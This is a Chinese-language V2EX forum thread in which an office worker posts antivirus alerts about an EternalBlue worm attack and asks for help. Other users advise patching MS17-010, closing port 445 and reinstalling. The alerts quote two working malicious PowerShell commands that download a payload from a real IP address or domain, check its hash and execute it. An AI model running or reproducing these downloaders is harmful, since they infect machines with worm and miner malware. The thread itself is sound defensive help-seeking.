V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
shadowyue
V2EX  ›  程序员

公司电脑,火绒提示被攻击,这是啥情况

  •  
  •   shadowyue · 2020-02-28 14:24:34 +08:00 · 7084 次点击
    这是一个创建于 1729 天前的主题,其中的信息可能已经有所发展或是发生改变。

    操作进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

    命令行:powershell -c "try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='1cd2db7421c0b88eb89eb6182bd6785e';$ifp=$env:tmp+'\if.bin';$down_url='http://207.154.225.82';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)|foreach{$s+=$.ToString('X2')};return $s}if(test-path $ifp){$con=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(New-Object Net.WebClient)."downloaddata"($down_url+'/if.bin?SZXHRZZLIT036&9CBD7D74-E8C3-6E51-230D-12457CECDB29&DC:4A:3E:76:02:A0');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}IEX(-join[char[]]$con)"

    攻击方式:Exploit/EternalBlue

    远程地址:10.83.3.33:445

    防御结果:已阻止

    37 条回复    2020-05-20 22:06:07 +08:00
    BrettD
        1
    BrettD  
       2020-02-28 14:27:36 +08:00 via iPhone
    勒索软件的感觉
    shadowyue
        2
    shadowyue  
    OP
       2020-02-28 14:29:35 +08:00
    http://207.154.225.82
    这个地址我还能访问,是个 nginx
    crab
        3
    crab  
       2020-02-28 14:29:59 +08:00
    局域网没打那补丁?
    phpinfos
        4
    phpinfos  
       2020-02-28 14:30:53 +08:00
    永恒之蓝 445 端口关掉 打补丁
    shadowyue
        5
    shadowyue  
    OP
       2020-02-28 14:30:57 +08:00
    @crab 啥补丁
    shadowyue
        6
    shadowyue  
    OP
       2020-02-28 14:33:10 +08:00
    @phpinfos 这个东西严重吗,要跟公司 IT 讲吗
    phpinfos
        7
    phpinfos  
       2020-02-28 14:35:11 +08:00
    @shadowyue
    一般会跟勒索病毒绑在一起,小心为好,赶紧修复吧
    补丁: https://technet.microsoft.com/zh-cn/library/security/MS17-010
    Osk
        8
    Osk  
       2020-02-28 14:36:48 +08:00
    看这样子怎么像 smb v1 的漏洞补丁没打?
    Osk
        9
    Osk  
       2020-02-28 14:38:24 +08:00
    不需要共享打印机和文件夹的话可以先在防火墙里面把本机的 445 等 smb service 端口关闭了,毕竟看样子你是在毒窝里面了🤣
    shadowyue
        10
    shadowyue  
    OP
       2020-02-28 14:47:35 +08:00
    淦哦,公司 win10 没法更新补丁
    shadowyue
        11
    shadowyue  
    OP
       2020-02-28 14:51:43 +08:00
    @Osk 毒窝吗,公司好多人正上班呢,跟 it 讲了没回我呢,还好火绒帮我挡住了
    shadowyue
        12
    shadowyue  
    OP
       2020-02-28 14:56:11 +08:00
    it 说自己杀毒就行,一直都有这个病毒🤣
    Osk
        13
    Osk  
       2020-02-28 14:59:04 +08:00
    @shadowyue 永恒之蓝在没打补丁或做防护措施的局域网中传播很快的。

    win7, win8, win 10 <1703 (好像是这个版本)都会中招。很好奇 win 10 没法更新补丁是什么情况?
    win10 打补丁比 win7 方便多了,只需要去下载最近的月度累计更新手动安装也很方便。


    作为用户,不想打补丁就先把本机的 445、135、137、138、139 端口关闭了,除非你需要共享打印机或者文件给别人。毕竟万一火绒没拦住就惨了
    Osk
        14
    Osk  
       2020-02-28 15:00:50 +08:00
    另外,看你们内网的 ip 都是 10 的,看起来是大公司了,it 都这么水吗 /doge/
    shadowyue
        15
    shadowyue  
    OP
       2020-02-28 15:13:27 +08:00
    @Osk 公司好像没几个人用 win10,我更新一直都是提示失败了,不知道为啥。

    我被攻击了 powershell 这个程序就疯狂跑吃 cpu,好奇别人没这个问题吗,电脑卡爆了应该有别人反馈才对。

    公司是蛮大的,工作累了直接睡,没问题 🤣
    Osk
        16
    Osk  
       2020-02-28 15:15:44 +08:00
    公司上外网需要使用代理吗?

    吃 cpu 而不搞你的文件的话,看起来像挖矿的程序,危害也。。。不大吧 /滑稽 /
    shadowyue
        17
    shadowyue  
    OP
       2020-02-28 15:21:34 +08:00
    @Osk 不用,但是禁止了一些娱乐网站,我自己挂代理可以浏览,哈哈
    按你说的吧 445 端口关闭了,貌似已经没问题了,谢谢你
    shadowyue
        18
    shadowyue  
    OP
       2020-02-28 15:41:04 +08:00
    @Osk 大佬救救我,这又是啥

    操作进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    命令行:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -c "$Lemon_Duck='1EdJ95\kmSXYuMOLF1';$x='t.awc'+'na.com';;$y='http://'+$x+'/x.js';$z=$y+'p?ipc_20200228';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'a49add2a8eeb7e89b9d743c0af0e1443'){IEX(-join[char[]]$m)}"

    风险分类:木马盗号

    访问网址:t.awcna.com/x.js

    操作结果:已阻止
    Shazoo
        19
    Shazoo  
       2020-02-28 15:55:40 +08:00
    下载 http://t.awcna.com/x.js ,如果程序的 md5=a49add2a8eeb7e89b9d743c0af0e1443,执行之。

    https://x.threatbook.cn/nodev4/domain/awcna.com 看看细节呗。
    Osk
        20
    Osk  
       2020-02-28 15:56:58 +08:00
    @shadowyue 看来一开始火绒并没有拦住病毒。。。先把 powershell 进程结束了看是否再生,建议断网杀毒。必要的话重装了。
    shadowyue
        21
    shadowyue  
    OP
       2020-02-28 15:59:11 +08:00
    @Shazoo 这个 js 文件从浏览器访问不到
    shadowyue
        22
    shadowyue  
    OP
       2020-02-28 16:00:31 +08:00
    @Osk 杀了隔十几分钟会又出来,在杀毒了,试试
    ThirdFlame
        23
    ThirdFlame  
       2020-02-28 16:07:45 +08:00   ❤️ 1
    你的电脑已经被控制了。 通过 powershell 执行恶意代码 ing
    shadowyue
        24
    shadowyue  
    OP
       2020-02-28 16:19:07 +08:00
    @ThirdFlame 怎么处理啊,大佬
    WordTian
        25
    WordTian  
       2020-02-28 16:26:55 +08:00 via Android
    备份好重要文件,重装系统吧,联网前关掉 445 端口
    juded
        26
    juded  
       2020-02-28 16:32:20 +08:00
    火绒行为管理不错,但查杀能力太差了。
    vocaloid
        27
    vocaloid  
       2020-02-28 16:37:37 +08:00
    把 powershell 进程先杀掉啊。。要不还会干更多的事情
    ihacku
        28
    ihacku  
       2020-02-28 16:46:08 +08:00 via iPhone
    这个动作本身已经被拦截了
    你没有打补丁,可以在火绒里面打下补丁重启生效
    可以通知 IT 发下 10.83.3.33 这台机器中毒了 杀毒打补丁
    内网应该不止这一台被感染的
    Osk
        29
    Osk  
       2020-02-28 16:51:26 +08:00
    @shadowyue 那我还是建议重装了, 如果非要清理, 最好进入离线系统, 使用其它杀毒软件对 C 盘全盘扫描, 离线的原因是避免恶意程序对自身做隐藏或者干扰.

    查杀完成后, 还需要在离线系统(干净的 PE 中)使用 autoruns 等工具对所有的 驱动, 服务, 自启动等项目手工排查, 一些恶意程序隐藏的很好, 我觉得这一步是必须的.

    最后问题来了: 都这么麻烦了, 还不如重装.


    重装后: 先不要联网, 防火墙关闭 smb v1(445), rdp(3389) 等端口, 不然处在毒窝中分分钟死灰复燃. 不过, 使用最新的 Windows 10 1909 镜像也不要太紧张, 大部分局域网传播的严重漏洞已经封好了.
    wanguorui123
        30
    wanguorui123  
       2020-02-28 17:07:42 +08:00
    永恒之蓝的变种蠕虫病毒有点多
    Ailoli
        31
    Ailoli  
       2020-02-28 18:34:22 +08:00
    之前公司同事电脑出现过,后面断网全盘查杀就解决了
    jousca
        32
    jousca  
       2020-02-28 18:37:07 +08:00
    内网里攻击你那台电脑中了蠕虫,永恒之蓝漏洞。
    manami
        33
    manami  
       2020-02-28 18:40:27 +08:00 via Android
    你需要卡巴斯基!
    Buges
        34
    Buges  
       2020-02-28 18:45:28 +08:00 via Android
    emptyiscolor
        35
    emptyiscolor  
       2020-02-29 11:15:11 +08:00
    @shadowyue 利用驱动人生后门进行传播的木马,建议直接重装系统然后安装主流杀软吧
    zdswater
        36
    zdswater  
       2020-05-20 22:05:44 +08:00
    中奖了,火绒扫了一遍杀了还有。不知道咋处理了
    zdswater
        37
    zdswater  
       2020-05-20 22:06:07 +08:00
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2771 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 25ms · UTC 13:34 · PVG 21:34 · LAX 05:34 · JFK 08:34
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.